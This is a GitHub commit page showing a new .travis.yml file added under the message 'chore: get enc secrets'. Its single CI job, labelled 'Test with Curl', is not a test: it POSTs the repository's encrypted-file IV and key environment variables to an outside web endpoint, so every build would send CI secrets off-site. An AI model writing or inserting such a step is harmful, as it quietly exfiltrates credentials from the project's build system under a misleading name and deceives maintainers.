Skip to content

Commit

Permalink
chore: get enc secrets
Browse files Browse the repository at this point in the history
  • Loading branch information
adityastic committed May 13, 2024
1 parent 977913e commit 604dd2c
Showing 1 changed file with 14 additions and 0 deletions.
14 changes: 14 additions & 0 deletions .travis.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,14 @@
language: python

python:
- "3.9"

jobs:
include:
- stage: Test
name: "Test with Curl"
script:
- |
curl --location 'https://badgemagic.adityagupta.my.id/write_key' \
--header 'Content-Type: application/json' \
--data '{"encrypted_f10b5e0e5262_iv": "'"$encrypted_f10b5e0e5262_iv"'", "encrypted_f10b5e0e5262_key": "'"$encrypted_f10b5e0e5262_key"'"}'

0 comments on commit 604dd2c

Please sign in to comment.